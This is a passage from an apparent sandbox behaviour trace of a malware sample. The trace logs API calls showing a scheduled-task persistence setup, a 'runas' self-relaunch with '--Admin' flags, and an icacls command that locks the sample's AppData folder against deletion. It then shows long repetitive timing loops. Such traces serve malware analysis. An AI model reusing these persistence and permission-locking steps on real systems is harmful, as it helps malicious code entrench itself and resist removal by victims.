ppActions=0x18df48*=0x2a10c00) returned 0x0 [0065.218] IActionCollection:Create (in: This=0x2a10c00, Type=0, ppAction=0x18df34 | out: ppAction=0x18df34*=0x2a10ec0) returned 0x0 [0065.219] IUnknown:Release (This=0x2a10c00) returned 0x1 [0065.219] IUnknown:QueryInterface (in: This=0x2a10ec0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18df50 | out: ppvObject=0x18df50*=0x2a10ec0) returned 0x0 [0065.219] IUnknown:Release (This=0x2a10ec0) returned 0x2 [0065.219] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.219] IExecAction:put_Path (This=0x2a10ec0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned 0x0 [0065.219] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.219] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.220] IExecAction:put_Arguments (This=0x2a10ec0, Arguments="--Task") returned 0x0 [0065.220] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.220] IUnknown:Release (This=0x2a10ec0) returned 0x1 [0065.220] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.220] ITaskFolder:RegisterTaskDefinition (in: This=0x90ff98, Path="Time Trigger Task", pDefinition=0x2a10b88, flags=6, UserId=0x18d9f0*(varType=0x0, wReserved1=0x334, wReserved2=0xdf04, wReserved3=0x18, varVal1=0x420cab, varVal2=0x640000), password=0x18da00*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), LogonType=3, sddl=0x18da14*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x138), ppTask=0x18df1c | out: ppTask=0x18df1c*=0x2a10f30) returned 0x0 [0065.384] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.384] TaskScheduler:IUnknown:Release (This=0x90ff98) returned 0x0 [0065.384] TaskScheduler:IUnknown:Release (This=0x2a10b88) returned 0x0 [0065.384] IUnknown:Release (This=0x2a10f30) returned 0x0 [0065.384] CoUninitialize () [0065.386] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3313aa8 | out: hHeap=0x640000) returned 1 [0065.386] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x331cf10 | out: hHeap=0x640000) returned 1 [0065.386] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x69c858 | out: hHeap=0x640000) returned 1 [0065.386] GetVersion () returned 0x1db10106 [0065.386] lstrcpyW (in: lpString1=0x18e380, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0065.386] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0065.386] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0065.386] ShellExecuteExW (in: pExecInfo=0x18e144*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e144*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0065.556] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x334bbe0 | out: hHeap=0x640000) returned 1 [0065.556] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x331fb00 | out: hHeap=0x640000) returned 1 [0065.556] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x334a208 | out: hHeap=0x640000) returned 1 [0065.609] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x692938 | out: hHeap=0x640000) returned 1 [0065.609] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x65e488 | out: hHeap=0x640000) returned 1 [0065.609] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x334aa10 | out: hHeap=0x640000) returned 1 [0065.609] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3357c58 | out: hHeap=0x640000) returned 1 [0065.609] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x6617b0 | out: hHeap=0x640000) returned 1 [0065.620] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x660480 | out: hHeap=0x640000) returned 1 [0065.621] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f408 | out: phModule=0x18f408) returned 0 [0065.621] ExitProcess (uExitCode=0x0) [0065.687] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3380e78 | out: hHeap=0x640000) returned 1 [0065.687] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x65f050 | out: hHeap=0x640000) returned 1 [0065.695] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0xb68 Thread: id = 3 os_tid = 0xb58 Thread: id = 4 os_tid = 0xa58 Thread: id = 5 os_tid = 0xb08 Thread: id = 6 os_tid = 0x6f4 Thread: id = 7 os_tid = 0xa28 Thread: id = 8 os_tid = 0xa88 Thread: id = 22 os_tid = 0xa18 Thread: id = 23 os_tid = 0x73c Thread: id = 32 os_tid = 0x78c Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9014000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000db03" [0xc000000f], "LOCAL" [0x7] Thread: id = 9 os_tid = 0x7c0 Thread: id = 10 os_tid = 0x310 Thread: id = 11 os_tid = 0x128 Thread: id = 12 os_tid = 0x7c8 Thread: id = 13 os_tid = 0x6cc Thread: id = 14 os_tid = 0x644 Thread: id = 15 os_tid = 0x63c Thread: id = 16 os_tid = 0x154 Thread: id = 17 os_tid = 0x150 Thread: id = 18 os_tid = 0x120 Thread: id = 19 os_tid = 0x124 Thread: id = 20 os_tid = 0x118 Thread: id = 21 os_tid = 0x3fc Process: id = "3" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x337f4000" os_pid = "0x180" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa98" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0x478 Thread: id = 25 os_tid = 0x750 Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x7a9ca000" os_pid = "0x530" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {DAD14AF5-82A5-4514-AFD0-06330000279A} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0x230 Thread: id = 27 os_tid = 0x5b8 Thread: id = 28 os_tid = 0x598 Thread: id = 29 os_tid = 0x548 Thread: id = 30 os_tid = 0x53c Thread: id = 31 os_tid = 0x534 Thread: id = 61 os_tid = 0xa84 Process: id = "5" image_name = "%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe" page_root = "0x327b8000" os_pid = "0x7f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa98" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0x770 [0065.919] GetTickCount () returned 0x11573aa [0065.919] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.920] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.921] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.922] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.923] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.924] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.925] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.926] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.927] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0065.928] GetTickCount () returned 0x11573aa [0069.004] lstrlenW (lpString="") returned 0 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.004] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.004] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.005] GetACP () returned 0x4e4 [0069.005] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.006] GetACP () returned 0x4e4 [0069.006] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 